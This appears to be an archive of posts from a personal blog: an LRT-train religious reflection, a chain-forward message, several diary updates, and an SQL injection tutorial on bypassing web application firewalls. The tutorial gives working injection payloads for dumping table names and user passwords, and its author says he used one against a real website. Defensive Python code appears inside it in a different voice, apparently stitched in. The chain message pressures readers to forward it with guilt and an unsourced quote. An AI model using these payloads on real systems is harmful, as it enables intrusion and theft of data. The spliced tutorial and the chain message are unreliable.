There’s ISLAM, But There’s No Muslim


I was on my way home, taking the LRT..
Went down the stairs..to wait for the LRT..while holding the book ISLAM : THE MISUNDERSTOOD RELIGION by DR. DANIAL ZAINAL ABIDIN because I wanted to finish reading it..
While going down the stairs I had already noticed someone watching..once down the stairs I had to walk past the person who had been watching..a man.
He was very interested in looking at the book I was holding..but I just acted normal..

Suddenly..
A ( the man from earlier ) : Assalamualaikum
But I didn't hear it clearly..then he repeated ..
” Assalamualaikum ”

*in my heart..”eh..is he Muslim?”
B ( Me ) : Waalaikumussalam

A : You read that book? about Islam? you’re Muslim right?

B : yeah..Alhamdulillah,i’m Muslim..
This book?ouh,juz to gain more knowledge about Islam to help me explain about this religion to the non-Muslims..

A : ouh..haha..funny right,Islam is there,but not Muslim..
( * at this point I wasn't very clear on what he said )

B : where are you from?

A : I’m from Palestine

B : Palestine?really??are you Muslim?

A : I was, but then I changed.

B : u changed? do u mean have converted?

A : yeah..now I’m free..a free thinker..

B : but why?

A : hmm..THERE’S ISLAM..BUT THERE’S NO MUSLIM IN THIS WORLD..

B : wait..what are u trying to say?

A : ouh my god,u didn’t understand me..
B : no, no, just confused, do u mean..THERE’S NO REAL MUSLIM NOWADAYS?

A : yeah..hmm..Islam is the best religion right..the real religion, you know right??

B : yeah..I know..and I Believe..

A : me too,I believed but..huh..there’s no Muslim..

He meant to say..in today's world THERE NO LONGER EXISTS ANYONE WHO CAN BE CALLED A MUSLIM..ISLAM EXISTS, BUT MUSLIMS ARE GONE

Then..I asked straight away..
B : if u said so, why don’t u try to be one? the real Muslim I mean..

A : huh..good question..hmm..TO BE THE REAL MUSLIM IN THIS WORLD,IT’S IMPOSSIBLE..IF YOU WANNA BE THE REAL MUSLIM, YOU CAN’T LIVE HERE,YOU CAN’T LIVE IN THIS WORLD..EVERYTHING CHANGED SISTER..THIS WORLD WAS SO CRUEL TO US, THEY CLAIM US AS TERRORISTS..

I fell silent..frozen..stiff..all sorts of things came to mind..but I didn't know what to say..my brain jammed..
He continued..

A : I saved half of Al-Quran in my heart..my mind..I’m a HAFIZ also..I wanna ask you, you pray 5 times a day, right?

B : yeah,alhamdulillah

A : we face the Kaabah as our direction for solah..where’s our FIRST QIBLAH?

B : Masjid Al-Aqsa..Baitul Maqdis??

A : yeah,but now it’s sold,it’s sold,it’s sold sister, the jews conquered it..
( * his face looked disappointed )

Suddenly…
A : i’ll stop at KLCC

B : ouh,ok..
( I went on reading the book..at that point it was the part on JESUS, SON OF GOD )

He asked straight away..
A : where’s JESUS born?

B : I don’t know..where?

A : you don’t know? but u called yourself Muslim..he was born at (whatever the name of the place was..I couldn't hear it clearly because it was noisy in the LRT )

B : where is it??

A : uhhhhh sisterrrr read more..read more..then u’ll know..I’m right..THERE’S NO MUSLIM NOWADAYS..

I just kept quiet..the way he did it looked like he actually just wanted to test me..hmm..I continued reading..the LRT arrived at KLCC

A : tq sister,i’ve got to go,read more..

I then sat down because there was an empty seat..Then..it kept ringing in my ears..
THERE’S ISLAM BUT THERE’S NO MUSLIM..
THERE’S ISLAM BUT THERE’S NO MUSLIM..
THERE’S ISLAM BUT THERE’S NO MUSLIM..
I looked around..
Women with uncovered hair..
Men wearing earrings, chains..
Women wearing tight clothes..
Men wearing shorts..
suddenly..
Drop..by drop..by drop..faster and faster..
True..I didn't see anyone with the character of a Muslim..
Even me..
Rasulullah said..
” ALMUSLIM MAN SALIMAL MUSLIM BILISANIHI WAYADIH ”
” A Muslim is one who saves other Muslims using his tongue and his hands ”
But what do I do when I see my fellow Muslims walking towards hell??
I let them be..I don't save them..

Am I still a Muslim in your eyes ya Allah? ya Rasulullah??

Rasulullah said..”A Muslim is not one who insults”
How many among us claim to be MUSLIM but always insult??
A Muslim recites the two declarations of the syahadah..how many truly understand the syahadah they recite??
ASYHADU AN LAA ILAHA ILLALLAH,WA ASYHADU ANNA MUHAMMADAN RASULULLAH?

A Muslim is one who performs the 5 daily prayers..
how many more are caught out on the 5 daily prayers??
Still dare to claim to be MUSLIM..
How many pray at the start of the prayer time?
How many truly understand what is recited in the prayer?
We don't even pass this part..let alone the other prayers..
SOLAT JAMA’, SOLAT QASAR, SOLAT KHAUF, PRAYER WHEN SICK..
if someone asks..can we answer?
I don't pass either..stuck even on the chapter on prayer..
A Muslim is one who pays zakat..how many still hold back their wealth from paying zakat?
How many truly understand what zakat is?
How many can explain what zakat is??
I can't either..hmm..I don't even pass on the pillars of Islam..
A Muslim is one who fasts in the month of Ramadhan..
How many still don't fast?
How many achieve the goal of fasting ( taqwa ) ??
How many can properly explain the matters of fasting??
When people ask..we fall silent..go and refer to the ustaz, ustazah..
Claim ISLAM..but don't pass the pillars of Islam..
A Muslim performs the hajj when able..
How many, when they get money, put a vacation elsewhere ahead of going for hajj?
How many know about the hajj of Rasulullah?
How many know what hajj actually is?
How many can explain hajj if someone asks?
I fail too..so many things I don't know..
We are busy reaching for other knowledge..
WE DON'T EVEN PASS ON KNOWLEDGE OF THE PILLARS OF ISLAM..
In the Quran it is mentioned..a Muslim is one who puts their trust in Allah..one who places their hope in Allah..
How many place their hope in humans?
How many hope a facial cleanser can cleanse their face?
How many hope money can make their life happy?
Many..
We don't even pass at being a good Muslim..let alone becoming a Mu’min..MUHSIN? Allah..don't know when..
Still many have the mentality of wanting to be just an ordinary MUSLIM..
We forget..we are in the end times..all kinds of trials come..ordinary faith cannot save us..
Again..TODAY'S WORLD IS INDEED CRUEL TO MUSLIMS..BUT REMEMBER..IT IS NOT FOR NOTHING THAT ALLAH CREATED US IN THIS ERA..
WE ARE CAPABLE..THAT IS WHY ALLAH ALLOWS US TO LIVE IN THIS ERA OF FITNAH..
The Muslim will emerge..
When we realise that we are not yet the real Muslim..
One who realises, acts..
One who merely knows..only stays silent..
Strength is not waited for..but sought..
Knowledge too is not waited for..but sought..
DO NOT FEEL SAFE WITH A SPECK OF FAITH

#‎copypaste
#‎orangmembencibilakitamenegur
#‎moga Allah redhadengandakwahyangsekecillnya.

If You Want Your English to Be Good, Read This!!!
– – Please read this to the end. You hardly have time for Allah. He loves you and always blesses you. He is always with you. I need you to spend 30 minutes of your time with Him today. Don’t pray. Just praise. Today I want this message across the world before midnight. Will you help? Please do not cut it, He always helps you with something that you are in need of. Please, drop everything & pass it on. Don’t break this chain. Why do we feel sleepy in Prayer, But stay awake through a 3 hour movie? Why are we so bored when we look at the AL-QURAN, But find it easy to read other books? Why is it so easy to ignore a msg about Allah, Yet we forward the nasty ones? Why are Prayers getting smaller, But bars and clubs are expanding? Why is it so easy to worship a celebrity, But very difficult to engage with Allah? Think about it, are you going to forward this? Are you going to ignore it, because, you think you will get laughed at? Forward this to all your friends. 80% of you won’t forward this. Allah said: If you deny me in front of your friends, I will deny you on the day of judgment: When one door closes, Allah opens two: If ALLAH has opened doors for you, send this message to everyone including me… Allah has no BLACKBERRY but He’s my favorite contact. He is not on TWITTER but I still follow Him. & even without the INTERNET I am always connected to Him. He is not on WHATSAPP but, He’s always online. Send this to everyone, including me. If Allah has helped you, and been there for you in every step of your life. 🙂 😢 Sorry for disturbing you.

C&P
80% of people won't read this message, let alone share it..

Bypassing WAF Filters in SQLi


Asalamu’alaikum…

Now I'm going to show how to bypass WAF filters.

Before anything else, make sure you have knowledge of SQLi.

OK, let's start..

What is a WAF, or Web Application Firewall?

-A web application firewall (WAF) is an appliance, server plugin, or filter that applies a set of rules to an HTTP conversation. Generally, these rules cover common attacks such as Cross-site Scripting (XSS) and SQL Injection. By customizing the rules to your application, many attacks can be identified and blocked. The effort to perform this customization can be significant and needs to be maintained as the application is modified.


Some websites use a WAF filter.

If you find a vulnerable site that has a WAF, and you try to inject a union-based query and it shows Not Acceptable, 403 Forbidden, or a Web Application Firewall alert, that means the query or syntax you injected was filtered or blocked by the WAF.

OK, now here are some methods to bypass WAF filters.

1) Comments:

SQL comments are a blessing to us SQL injectors. They allow us to bypass a lot of the restrictions of web application firewalls and to kill certain SQL statements to execute the attacker's commands while commenting out the actual legitimate query. Some comments in SQL:

//, -- , /**/, #, --+, -- -, ;


2) Case Changing:

Some WAFs will filter only lowercase attacks. As we can see, we can easily evade this by case changing:

Possible Regex filter:

/union\sselect/g

id=1+UnIoN/**/SeLeCT, or with XSS -> alert(1)


3) Inline Comments:

Some WAFs filter keywords with a rule like /union\sselect/ig. We can bypass this filter by using inline comments most of the time. More complex examples will require a more advanced approach, like adding SQL keywords that will further separate the two words:

id=1/*!UnIoN*/SeLeCT

Take notice of the exclamation point: /*!code*/. The exclamation point executes our SQL statement.

Inline comments can be used throughout the SQL statement, so if table_name or information_schema are filtered we can add more inline comments. For example, let's pretend a site filters union, where, table_name, table_schema, =, and information_schema. These are 3 statements we need to inject into our target.

For this we would:

id=1/*!UnIoN*/+SeLeCT+1,2,concat(/*!table_name*/)+FrOM /*information_schema*/.tables /*!WHERE */+/*!TaBlE_ScHeMa*/+like+database()-- –

The above code would bypass the filter. Notice we can use 'like' instead of '='.

Another way to use inline comments: when everything seems to fail, you can try to throw the application firewall off by crafting a SQL statement using variables:

id=1+UnIoN/*&a=*/SeLeCT/*&a=*/1,2,3,database()-- –

The above code should bypass the union+select filters even where common inline comments didn't work by themselves.

4) Buffer Overflow / Unexpected Input:

A lot of WAFs are written in the C language, making them prone to overflow or to act differently when loaded with a bunch of data. Here is a WAF that does its job correctly, but when given a large amount of data allows the malicious request and response.

id=1 and (select 1)=(Select 0xAAAAAAAAAAAAAAAAAAAAA 1000 more A's)+UnIoN+SeLeCT+1,2,version(),4,5,database(),user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--+

This bypass above works. I myself just used this against a Web site recently.

5) Replaced keywords (preg_replace and/or WAFs with the same action):

Sometimes an application will remove all of a keyword. For instance, let's say we have a filter that replaces union select with whitespace. We could bypass that filter like so:

id=1+UNIunionON+SeLselectECT+1,2,3--

As you can see, once union+select has been removed, our capital UNION+SELECT takes its place, successfully injecting our query:

UNION+SELECT+1,2,3--
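
Seen from the filter author's side, the weakness is that one removal pass can leave behind exactly the keyword it was meant to remove. The sketch below is an added example, not code from the original tutorial; the function names and the constructed `NESTED` sample (the page's string with `+` decoded to spaces) are assumptions for illustration. It contrasts single-pass stripping with stripping to a fixed point and with rejecting anything that is not a plain integer id.

```python
import re

_KEYWORDS = re.compile(r"union|select", re.IGNORECASE)

def strip_once(value):
    """Single-pass keyword removal: the sanitizer behaviour described above."""
    return _KEYWORDS.sub("", value)

def strip_until_stable(value, max_rounds=20):
    """Repeat the removal until nothing changes; fail closed if it never settles."""
    for _ in range(max_rounds):
        cleaned = _KEYWORDS.sub("", value)
        if cleaned == value:
            return cleaned
        value = cleaned
    raise ValueError("input did not stabilise")

def parse_id(value):
    """Allowlist validation: an id is decimal digits only, anything else is refused."""
    if not re.fullmatch(r"[0-9]{1,18}", value):
        raise ValueError("id must be a positive integer")
    return int(value)

def is_rejected(value):
    """True when parse_id refuses the value instead of trying to repair it."""
    try:
        parse_id(value)
    except ValueError:
        return True
    return False

# Constructed sample (assumption): the page's nested-keyword string, '+' decoded.
NESTED = "1 UNIunionON SeLselectECT 1,2,3"

if __name__ == "__main__":
    print("one pass     :", repr(strip_once(NESTED)))          # keywords reassemble
    print("fixed point  :", repr(strip_until_stable(NESTED)))  # keywords gone, input mangled
    print("allowlist    :", "rejected" if is_rejected(NESTED) else "accepted")
```

Stripping to a fixed point removes the keywords but still passes altered input on to the query, so rejecting the request is the safer behaviour.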


6) Character encoding:

Most WAFs will decode and filter an application's input, but some WAFs only decode the input once, so double encoding can bypass certain filters: the WAF decodes the input once and then filters, while the application keeps decoding the SQL statement, executing our code.

Examples of double encoding:

id=1%2f%2a*/UNION%2f%2a /SELECT%2f%2a*/1,2,password%2f%2a*/FROM%2f%2a*/Users--+
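
The case-changing, inline-comment and double-encoding tricks above all work because the rule is matched against the raw request instead of the text the database ends up parsing. This added example (not part of the original tutorial; the function names and the constructed sample set are assumptions) canonicalizes a parameter value before matching and compares the page's `/union\sselect/` rule with the hardened check.

```python
import re
from urllib.parse import quote, unquote_plus

NAIVE_RULE = re.compile(r"union\sselect")            # the page's "possible regex filter"
RULE = re.compile(r"\bunion\s+(?:all\s+)?select\b")  # applied to canonical text only

def canonicalize(raw, max_rounds=5):
    """Reduce a parameter value to roughly what the SQL parser will see."""
    text = raw
    for _ in range(max_rounds):          # decode until stable: covers double encoding
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    # MySQL executes the body of /*! ... */, so keep the body and drop the wrapper.
    text = re.sub(r"/\*!(?:\d{5})?(.*?)\*/", r" \1 ", text, flags=re.S)
    # Ordinary comments behave like whitespace between tokens.
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.S)
    return re.sub(r"\s+", " ", text).strip().lower()

def naive_flags(raw):
    return NAIVE_RULE.search(raw) is not None

def hardened_flags(raw):
    return RULE.search(canonicalize(raw)) is not None

# Constructed samples: two strings from the page, one value built by encoding
# twice with quote(), and one benign id.
SAMPLES = {
    "case + comment": "1+UnIoN/**/SeLeCT",
    "inline comment": "1/*!UnIoN*/SeLeCT",
    "double encoded": quote(quote("1/**/UNION/**/SELECT", safe=""), safe=""),
    "benign": "42",
}

def report():
    """Map each sample name to (naive rule fired, hardened rule fired)."""
    return {name: (naive_flags(v), hardened_flags(v)) for name, v in SAMPLES.items()}

if __name__ == "__main__":
    for name, (naive, hardened) in report().items():
        print(f"{name:15} naive={naive!s:5} hardened={hardened}")
```

Signature matching of this kind is a secondary control; binding the value as a query parameter is what removes the injection itself.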

[# Tut By Pain006 ]

When you get an error at a number, that number is one too many, so don't count it.

For example, order by 8 <= no error | order by 9 <= error, so we have 8 columns, and the query will be union all select 1,2,3,4,5,6,7,8– –

enjoy 

16 Jamadil-Awwal 1436 Hijriyyah.


Assalamu’alaikum warahmatullahi wabaarakaatuh.

Alhamdulillah, thanks be to God, for because of Him I am still given breath to continue living on His earth and to keep striving in carrying out the acts of worship that are commanded..still given the strength to stand, still given a strong heart to understand, still able to walk and still able to type a word or two in this public diary of mine, which has many shortcomings.

Today marks exactly 29 years since I was born. Only Allah knows what my life has been like during 7 years in the city of Kuala Lumpur. I want to wish a happy birthday to my friends who celebrate their birthday on this 6 March, namely Aida, Akma and Faridah… May you always be blessed by Allah s.w.t, showered with abundant sustenance, granted lasting health, and blessed with a long life.

I am grateful to God for granting me a family that loves me, friends who always help me in hard times, and comrades at MML, MPI, SMKDAM, UiTM, and UniKL ( sorry, not mentioning your names ).. And not forgetting my beloved Afzan, who is always behind me ( even though sometimes in front of me ). I will always pray for all of you.

Wassalam.


Posted from Nokia N900

2014 in review


The WordPress.com stats helper monkeys prepared a 2014 annual report for this blog.

Here’s an excerpt:

The concert hall at the Sydney Opera House holds 2,700 people. This blog was viewed about 12,000 times in 2014. If it were a concert at Sydney Opera House, it would take about 4 sold-out performances for that many people to see it.


Just updated


Salam, gang…

I feel like it's been a really long time since I updated anything here…huhu…you know how it is, just endlessly busy…and now I've upgraded my job from technician before to network engineer…ALHAMDULILLAH….more sustenance…can get married a bit sooner…kikiki…and to the MIIT kids, seriously, I feel like meeting up with you all…hanging out and laughing like before…haish…my childish ways never end, right…but that's me…hehe…even when I have kids later this is how I'll be…

Sometimes I also wonder where hekmah sengal, dayah, mira, shah, ayoi, kiko, ijat pacat, bana, mamu and all the rest have disappeared to…I only see their updates on Facebook…in the blink of an eye it's already 2014…and about to be Feb already…so many things 'happened' over these 2 years…and most importantly it's cik are who is always by my side through hard times and good…haha…

As I'm typing this, I'm at KLIA2…stopping to rest for a bit, I've travelled far today…this is what living in project work is like…feels like no life at all…all I know is, daytime at site, nighttime just at home…when the body is tired and the brain is worn out, there's really no time to think about this blog…I flipped back through my blogs from the early days of getting to know blogging…huhu…my blogspot is still there…I thought I had deleted it for certain reasons…but it still hasn't disappeared from the internet….encik amran, can you teach me to hack this internet server…sifu bana, please help too…

To my friend cik dayah, when are we going to eat corn porridge???????

To my bff, cik nora, when are you coming back to Malaysia??? Let me know when you're back, okay..you didn't even tell me when you left the other day…

I'll spend my time in the village next week celebrating Raya..hehe. Sleeping on the beach at night is nice too…release tension… have to think about what my next step is…so many things I want to do…haha…so, that's all for now…have to get back to work…

JAZAAKUMULLAHU KHAIRAN KATHIIRAA..